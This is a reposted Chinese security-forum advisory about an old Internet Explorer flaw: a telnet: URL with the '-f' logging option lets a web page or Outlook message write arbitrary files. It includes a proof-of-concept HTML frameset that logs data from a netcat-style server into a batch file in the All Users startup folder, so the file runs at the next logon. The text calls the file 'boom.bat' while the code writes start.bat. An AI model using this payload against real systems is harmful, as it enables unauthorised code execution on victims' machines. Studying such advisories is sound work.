20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 通过 IE 调用 Telnet 执行攻击者代码漏洞

   
作者 标题: 通过 IE 调用 Telnet 执行攻击者代码漏洞
ghost
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
涉及程序:
Intetnet Explorer , Telnet Client

描述:
通过 IE 调用 Telnet 执行攻击者代码漏洞

详细:
通过 IE 调用 Telnet 时存在一个安全漏洞。设计中,用户可以通过 IE 来调用 Telnet。但是在 Windows NT 4.0 或 Windows 2000 中,如果 Telnet 客户端是作为 Services for Unix (SFU) 2.0 的一部分安装,这样 WEB 站点指定的任意命令行选项都可以通过 IE 来调用 Telnet。当IE执行‘TELNET’命令时,它将命令行参数传给 TELNET 程序。WINDOWS2000 TELNET 客户端包含一个客户方日志选项,它是根据其选项来记录 TELNET 数据的。通过在 TELNET 命令中指定“-f‘ 选项,所有的过程都能被记录到这个文件。利用此漏洞,攻击者能重写任意文件,或创建文件。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


在 IE 地址栏键入:telnet:-f%20\file.txt%20host
将使 IE 激起 TELNET 客户端,记录下所有的输出到文件“\file.txt"中。通过建立一个伪服务器(如NETCAT),攻击者能将任意代码写入这个文件。并且,TELNE CLIENT能隐藏在HTML中自动执行。此漏洞也通过 OUTLOOK 执行,因为在缺省状态下,OUTLOOK 会自动执行 HTML 信息。

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>

这将会使来自8000端口的数据被写入文件“boom.bat”(此文件位于所有使用者的起始目录)。若登录用户有适当的权限就有可能创建一个批处理文件,当下一个用户登录时它将会被自动执行。

受影响系统:
带有为 UNIX2.0 服务的所有 IE 版本


zhuan zai

IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。